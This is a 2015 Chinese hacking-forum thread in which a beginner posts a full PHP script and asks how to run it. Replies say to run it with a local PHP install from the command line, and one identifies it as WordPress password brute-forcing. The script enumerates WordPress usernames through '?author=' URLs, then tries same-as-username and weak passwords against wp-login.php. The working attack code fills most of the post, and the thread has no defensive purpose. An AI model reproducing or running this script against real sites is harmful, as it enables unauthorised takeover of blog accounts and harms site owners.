查看: 3439|回复: 4

求教脚本怎么使用

[复制链接]
  • TA的每日心情
    开心
    2017-1-23 17:58
  • 签到天数: 89 天

    [LV.6]常住居民II

    发表于 2015-12-16 18:01:15 | 显示全部楼层 |阅读模式
    悬赏10i币已解决
    本人小白一个  经常看见一些大牛发帖  里面都有一些脚本  但不会用求教  
    比如这样的
    <?php
      
    set_time_limit(0);
    $domain = $argv[1];
      
    //获取用户名
    for ($i=1; $i <= 10; $i++) {
      
        $url = $domain."/?author=".$i;
        $response = httprequest($url,0);
        if ($response == 404) {
            continue;
        }
        $pattern = "/author\/(.*)\/feed/";
        preg_match($pattern, $response, $name);
        $namearray[] = $name[1];
    }
      
    echo "共获取用户".count($namearray)."名用户\n";
      
    echo "正在破解用户名与密码相同的用户:\n";
      
    $crackname = crackpassword($namearray,"same");
      
    $passwords = file("pass.txt");
      
    echo "正在破解弱口令用户:\n";
      
    if ($crackname) {
        $namearray = array_diff($namearray,$crackname);
    }
      
    crackpassword($namearray,$passwords);
      
    function crackpassword($namearray,$passwords){
        global $domain;
        $crackname = "";
        foreach ($namearray as $name) {
            $url = $domain."/wp-login.php";
            if ($passwords == "same") {
                $post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
                $pos = strpos(httprequest($url,$post),'div id="login_error"');
                if ($pos === false) {
                    echo "$name $name"."\n";
                    $crackname[] = $name;
                }
            }else{
                foreach ($passwords as $pass) {
                    $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
                    $pos = strpos(httprequest($url,$post),'div id="login_error"');
                    if ($pos === false) {
                        echo "$name $pass"."\n";
                    }
                }
            }
        }
        return $crackname;
    }
      
      
    function httprequest($url,$post){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$url");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
      
        if($post){
            curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
      
        $output = curl_exec($ch);
        $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
        curl_close($ch);
      
      
        if ($httpcode == 404) {
            return 404;
        }else{
            return $output;
        }
    }
    ?>

    最佳答案

    查看完整内容

    根据脚本的类型来用。 比如你这个是php的,本地要有php的环境,cmd下运行,有参数要求就要加参数
    回复

    使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-12-16 18:01:16 | 显示全部楼层
    根据脚本的类型来用。
    比如你这个是php的,本地要有php的环境,cmd下运行,有参数要求就要加参数

    点评

    请问有详细的教程吗?  详情 回复 发表于 2015-12-17 20:16
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2015-12-17 08:44:23 | 显示全部楼层
    wp博客的密码爆破啊。

    点评

    给你发qq不回我。。。  详情 回复 发表于 2015-12-17 18:53
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-23 17:58
  • 签到天数: 89 天

    [LV.6]常住居民II

     楼主| 发表于 2015-12-17 18:53:01 | 显示全部楼层
    C4r1st 发表于 2015-12-17 08:44
    wp博客的密码爆破啊。

    给你发qq不回我。。。
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-23 17:58
  • 签到天数: 89 天

    [LV.6]常住居民II

     楼主| 发表于 2015-12-17 20:16:13 | 显示全部楼层
    90_ 发表于 2015-12-16 18:01
    根据脚本的类型来用。
    比如你这个是php的,本地要有php的环境,cmd下运行,有参数要求就要加参数 ...

    请问有详细的教程吗?
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-28 19:21 , Processed in 0.027630 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部